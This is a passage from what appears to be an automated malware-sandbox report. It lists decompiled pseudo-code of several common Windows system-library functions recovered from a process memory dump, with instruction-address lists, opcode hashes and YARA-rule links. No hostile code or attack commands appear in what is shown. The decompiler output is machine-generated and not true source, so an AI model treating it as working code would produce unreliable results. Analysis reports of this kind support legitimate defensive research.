					if( *0x31b53e8 > 5 && E03108F33(0x31b53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x31b53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x31b53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x30abc46;
						_t48 = E03147B9C(0x31b53e8, 0x30abc46, _t67, 0x31b53e8, _t70,  &_v140);
					}
				}
				return E0310B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                                                                                                    0x03108ec7
                                                                                                                                                    0x03108ed9
                                                                                                                                                    0x03108edc
                                                                                                                                                    0x03108ee6
                                                                                                                                                    0x03108ee9
                                                                                                                                                    0x03108eee
                                                                                                                                                    0x03108efc
                                                                                                                                                    0x03108f08
                                                                                                                                                    0x03141349
                                                                                                                                                    0x03141353
                                                                                                                                                    0x0314135d
                                                                                                                                                    0x03141366
                                                                                                                                                    0x0314136f
                                                                                                                                                    0x03141375
                                                                                                                                                    0x0314137c
                                                                                                                                                    0x03141385
                                                                                                                                                    0x03141390
                                                                                                                                                    0x03141391
                                                                                                                                                    0x0314139c
                                                                                                                                                    0x0314139d
                                                                                                                                                    0x031413a6
                                                                                                                                                    0x031413ac
                                                                                                                                                    0x031413b2
                                                                                                                                                    0x031413b5
                                                                                                                                                    0x031413bc
                                                                                                                                                    0x031413bf
                                                                                                                                                    0x031413c2
                                                                                                                                                    0x031413c5
                                                                                                                                                    0x031413c8
                                                                                                                                                    0x031413cb
                                                                                                                                                    0x031413ce
                                                                                                                                                    0x031413d1
                                                                                                                                                    0x031413d4
                                                                                                                                                    0x031413d7
                                                                                                                                                    0x031413da
                                                                                                                                                    0x031413dd
                                                                                                                                                    0x031413e0
                                                                                                                                                    0x031413e3
                                                                                                                                                    0x031413e6
                                                                                                                                                    0x031413e9
                                                                                                                                                    0x031413f6
                                                                                                                                                    0x03141400
                                                                                                                                                    0x03141400
                                                                                                                                                    0x03108f08
                                                                                                                                                    0x03108f32

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 86ba8e4806b71398b3c6f3acfe072fe5c1f7123a25ec03964724c7d81afd00cf
                                                                                                                                                    • Instruction ID: eb7734b1cc4d7c5010697e1440b8c29635fca5789ced80c2da028ab43992eadc
                                                                                                                                                    • Opcode Fuzzy Hash: 86ba8e4806b71398b3c6f3acfe072fe5c1f7123a25ec03964724c7d81afd00cf
                                                                                                                                                    • Instruction Fuzzy Hash: 964190B5D003189FDB24CFAAD980AADFBF5FB48710F5041AEE519A7240E7705A84CF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030FE730, Relevance: .1, Instructions: 89COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                    			E030FE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E03109670() < 0) {
					L0311DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x31b7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L030E4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M030FE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                                                                                                    0x030fe730
                                                                                                                                                    0x030fe736
                                                                                                                                                    0x030fe738
                                                                                                                                                    0x030fe73d
                                                                                                                                                    0x030fe73e
                                                                                                                                                    0x030fe740
                                                                                                                                                    0x030fe749
                                                                                                                                                    0x030fe765
                                                                                                                                                    0x030fe76a
                                                                                                                                                    0x030fe76b
                                                                                                                                                    0x030fe76c
                                                                                                                                                    0x030fe76d
                                                                                                                                                    0x030fe76e
                                                                                                                                                    0x030fe76f
                                                                                                                                                    0x030fe775
                                                                                                                                                    0x030fe777
                                                                                                                                                    0x030fe77e
                                                                                                                                                    0x0313b675
                                                                                                                                                    0x030fe784
                                                                                                                                                    0x030fe784
                                                                                                                                                    0x030fe789
                                                                                                                                                    0x030fe7a8
                                                                                                                                                    0x030fe7ac
                                                                                                                                                    0x030fe807
                                                                                                                                                    0x030fe7ae
                                                                                                                                                    0x030fe7ae
                                                                                                                                                    0x030fe7b1
                                                                                                                                                    0x030fe7b4
                                                                                                                                                    0x030fe7b9
                                                                                                                                                    0x030fe7c0
                                                                                                                                                    0x030fe7c4
                                                                                                                                                    0x030fe7ca
                                                                                                                                                    0x030fe7cc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fe7d3
                                                                                                                                                    0x030fe7d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fe7ff
                                                                                                                                                    0x030fe802
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fe7f9
                                                                                                                                                    0x030fe7fc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fe7f3
                                                                                                                                                    0x030fe7f6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fe7ed
                                                                                                                                                    0x030fe7f0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fe7e7
                                                                                                                                                    0x030fe7ea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313b685
                                                                                                                                                    0x0313b688
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313b682
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fe7cc
                                                                                                                                                    0x030fe7d9
                                                                                                                                                    0x030fe7dc
                                                                                                                                                    0x030fe7de
                                                                                                                                                    0x030fe7de
                                                                                                                                                    0x030fe7ac
                                                                                                                                                    0x030fe7e4
                                                                                                                                                    0x030fe74b
                                                                                                                                                    0x030fe751
                                                                                                                                                    0x030fe759
                                                                                                                                                    0x030fe761
                                                                                                                                                    0x030fe761

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5a069d94fd9d5ef065d9e4a327b7db2131459905932ea7ccc6a649edc4d349c5
                                                                                                                                                    • Instruction ID: f9c710278b1b2392eaef13543926318ec434251142a7a209a7c8e0eba64b230d
                                                                                                                                                    • Opcode Fuzzy Hash: 5a069d94fd9d5ef065d9e4a327b7db2131459905932ea7ccc6a649edc4d349c5
                                                                                                                                                    • Instruction Fuzzy Hash: 3D318D75A14349AFD744DF18D841B9AB7E4FB09310F148666FA08CB751E631E980CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030FBC2C, Relevance: .1, Instructions: 88COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                    			E030FBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x31b6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E030E2280(0xd, 0xf88f1a0);
				_t41 =  *0x31b60f8; // 0x0
				if(_t41 != 0) {
					 *0x31b60f8 =  *_t41;
					 *0x31b60fc =  *0x31b60fc + 0xffff;
				}
				E030DFFB0(_t41, 0x800, 0xf88f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x31b60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L030E4620(0x31b6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x31b6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                                                                                                    0x030fbc36
                                                                                                                                                    0x030fbc42
                                                                                                                                                    0x030fbc45
                                                                                                                                                    0x030fbc4a
                                                                                                                                                    0x030fbd35
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fbc50
                                                                                                                                                    0x030fbc50
                                                                                                                                                    0x030fbc58
                                                                                                                                                    0x030fbc5a
                                                                                                                                                    0x030fbc60
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313a4f2
                                                                                                                                                    0x0313a4f6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313a4fc
                                                                                                                                                    0x030fbc79
                                                                                                                                                    0x030fbc7e
                                                                                                                                                    0x030fbc86
                                                                                                                                                    0x030fbd16
                                                                                                                                                    0x030fbd20
                                                                                                                                                    0x030fbd20
                                                                                                                                                    0x030fbc8d
                                                                                                                                                    0x030fbc94
                                                                                                                                                    0x030fbcbd
                                                                                                                                                    0x030fbcca
                                                                                                                                                    0x030fbccb
                                                                                                                                                    0x030fbccc
                                                                                                                                                    0x030fbccd
                                                                                                                                                    0x030fbcce
                                                                                                                                                    0x030fbcd4
                                                                                                                                                    0x030fbcea
                                                                                                                                                    0x030fbcee
                                                                                                                                                    0x030fbcf2
                                                                                                                                                    0x030fbd00
                                                                                                                                                    0x030fbd04
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fbc96
                                                                                                                                                    0x030fbcab
                                                                                                                                                    0x030fbcaf
                                                                                                                                                    0x030fbd2c
                                                                                                                                                    0x030fbd2c
                                                                                                                                                    0x030fbd09
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fbd09
                                                                                                                                                    0x030fbcb1
                                                                                                                                                    0x030fbcb5
                                                                                                                                                    0x030fbcbb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fbcbb

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2744b6df7a25147f6bfdfe70e33812dea75bd7ba8ac8a85a010fecaddc775d5f
                                                                                                                                                    • Instruction ID: c80c0feadaa50f8aebdf855ed34249bbf773d473838c8eca0aaa4f7c20bad771
                                                                                                                                                    • Opcode Fuzzy Hash: 2744b6df7a25147f6bfdfe70e33812dea75bd7ba8ac8a85a010fecaddc775d5f
                                                                                                                                                    • Instruction Fuzzy Hash: 6A31DD36A026159FCB51EF58C4807AA73A8EF68310F084479EA45EB605FB74D9458B91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030C9100, Relevance: .1, Instructions: 87COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                    			E030C9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x319f6e8);
				E0311D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E031988F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0311D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x31b86c0; // 0x8407b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x31b86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E030E2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E031988F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0310AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x31bb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x31b84c0;
										if(_t69 >=  *0x31b84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E03199063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E030C922A(_t82);
							_t53 = E030E7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E03198B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x31b86c0; // 0x8407b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x31b86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x31b86bc;
										_t72 = 0x31b86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E030C9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x31b86c4;
									_t72 = 0x31b86c0;
									L18:
									E030F9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                                                                                                    0x030c9100
                                                                                                                                                    0x030c9100
                                                                                                                                                    0x030c9100
                                                                                                                                                    0x030c9100
                                                                                                                                                    0x030c9102
                                                                                                                                                    0x030c9107
                                                                                                                                                    0x030c910c
                                                                                                                                                    0x030c9110
                                                                                                                                                    0x030c9115
                                                                                                                                                    0x030c9136
                                                                                                                                                    0x030c9143
                                                                                                                                                    0x031237e4
                                                                                                                                                    0x031237e4
                                                                                                                                                    0x030c9149
                                                                                                                                                    0x030c914e
                                                                                                                                                    0x030c914e
                                                                                                                                                    0x030c9117
                                                                                                                                                    0x030c911d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c911f
                                                                                                                                                    0x030c9125
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c9151
                                                                                                                                                    0x030c9158
                                                                                                                                                    0x030c915d
                                                                                                                                                    0x030c9161
                                                                                                                                                    0x030c9168
                                                                                                                                                    0x03123715
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c916e
                                                                                                                                                    0x030c916e
                                                                                                                                                    0x030c9175
                                                                                                                                                    0x030c9177
                                                                                                                                                    0x030c917e
                                                                                                                                                    0x030c917f
                                                                                                                                                    0x030c9182
                                                                                                                                                    0x030c9182
                                                                                                                                                    0x030c9187
                                                                                                                                                    0x030c9187
                                                                                                                                                    0x030c918a
                                                                                                                                                    0x030c918d
                                                                                                                                                    0x030c918f
                                                                                                                                                    0x030c9192
                                                                                                                                                    0x030c9195
                                                                                                                                                    0x030c9198
                                                                                                                                                    0x030c9198
                                                                                                                                                    0x030c9198
                                                                                                                                                    0x030c919a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312371f
                                                                                                                                                    0x03123721
                                                                                                                                                    0x03123727
                                                                                                                                                    0x0312372f
                                                                                                                                                    0x03123733
                                                                                                                                                    0x03123735
                                                                                                                                                    0x03123738
                                                                                                                                                    0x0312373b
                                                                                                                                                    0x0312373d
                                                                                                                                                    0x03123740
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03123746
                                                                                                                                                    0x03123749
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312374f
                                                                                                                                                    0x03123751
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03123757
                                                                                                                                                    0x03123759
                                                                                                                                                    0x0312375c
                                                                                                                                                    0x0312375c
                                                                                                                                                    0x0312375e
                                                                                                                                                    0x0312375e
                                                                                                                                                    0x03123761
                                                                                                                                                    0x03123764
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03123766
                                                                                                                                                    0x03123768
                                                                                                                                                    0x031237a3
                                                                                                                                                    0x031237a3
                                                                                                                                                    0x031237a5
                                                                                                                                                    0x031237a7
                                                                                                                                                    0x031237ad
                                                                                                                                                    0x031237b0
                                                                                                                                                    0x031237b2
                                                                                                                                                    0x031237bc
                                                                                                                                                    0x031237c2
                                                                                                                                                    0x031237c2
                                                                                                                                                    0x031237b2
                                                                                                                                                    0x030c9187
                                                                                                                                                    0x030c9187
                                                                                                                                                    0x030c918a
                                                                                                                                                    0x030c918d
                                                                                                                                                    0x030c918f
                                                                                                                                                    0x030c9192
                                                                                                                                                    0x030c9195
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c9195
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c9187
                                                                                                                                                    0x0312376a
                                                                                                                                                    0x0312376a
                                                                                                                                                    0x0312376c
                                                                                                                                                    0x0312376c
                                                                                                                                                    0x0312376f
                                                                                                                                                    0x03123775
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03123777
                                                                                                                                                    0x03123779
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03123782
                                                                                                                                                    0x03123787
                                                                                                                                                    0x03123789
                                                                                                                                                    0x03123790
                                                                                                                                                    0x03123790
                                                                                                                                                    0x0312378b
                                                                                                                                                    0x0312378b
                                                                                                                                                    0x0312378b
                                                                                                                                                    0x03123792
                                                                                                                                                    0x03123795
                                                                                                                                                    0x03123795
                                                                                                                                                    0x03123798
                                                                                                                                                    0x03123798
                                                                                                                                                    0x0312379b
                                                                                                                                                    0x0312379b
                                                                                                                                                    0x030c91a3
                                                                                                                                                    0x030c91a9
                                                                                                                                                    0x030c91b0
                                                                                                                                                    0x030c91b4
                                                                                                                                                    0x030c91b4
                                                                                                                                                    0x030c91bb
                                                                                                                                                    0x030c91c0
                                                                                                                                                    0x030c91c5
                                                                                                                                                    0x030c91c7
                                                                                                                                                    0x031237da
                                                                                                                                                    0x030c91cd
                                                                                                                                                    0x030c91cd
                                                                                                                                                    0x030c91cd
                                                                                                                                                    0x030c91d2
                                                                                                                                                    0x030c91d5
                                                                                                                                                    0x030c9239
                                                                                                                                                    0x030c9239
                                                                                                                                                    0x030c91d7
                                                                                                                                                    0x030c91db
                                                                                                                                                    0x030c91e1
                                                                                                                                                    0x030c91e7
                                                                                                                                                    0x030c91fd
                                                                                                                                                    0x030c9203
                                                                                                                                                    0x030c921e
                                                                                                                                                    0x030c9223
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c9223
                                                                                                                                                    0x030c9205
                                                                                                                                                    0x030c9208
                                                                                                                                                    0x030c920c
                                                                                                                                                    0x030c9214
                                                                                                                                                    0x030c9214
                                                                                                                                                    0x030c91e9
                                                                                                                                                    0x030c91e9
                                                                                                                                                    0x030c91ee
                                                                                                                                                    0x030c91f3
                                                                                                                                                    0x030c91f3
                                                                                                                                                    0x030c91f3
                                                                                                                                                    0x030c91e7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c91db
                                                                                                                                                    0x030c9187
                                                                                                                                                    0x030c9168

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 16663fc44416322798061cac8d50b49218f022e4395dfb2630653d1b3f5ca133
                                                                                                                                                    • Instruction ID: a8405a9e5e1a6d2567bc0bd958c7a49fcb8f051aef9f2234cac29a94e6b641ec
                                                                                                                                                    • Opcode Fuzzy Hash: 16663fc44416322798061cac8d50b49218f022e4395dfb2630653d1b3f5ca133
                                                                                                                                                    • Instruction Fuzzy Hash: 2831C379A127C8DFDB65DB6CC0897ACBBF5BB8D710F18859DC8146B250C334A980CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F1DB5, Relevance: .1, Instructions: 87COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                    			E030F1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E030EF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L030E4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E030EF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                                                                                                    0x030f1dc2
                                                                                                                                                    0x030f1dc5
                                                                                                                                                    0x030f1dc7
                                                                                                                                                    0x030f1dcc
                                                                                                                                                    0x030f1dce
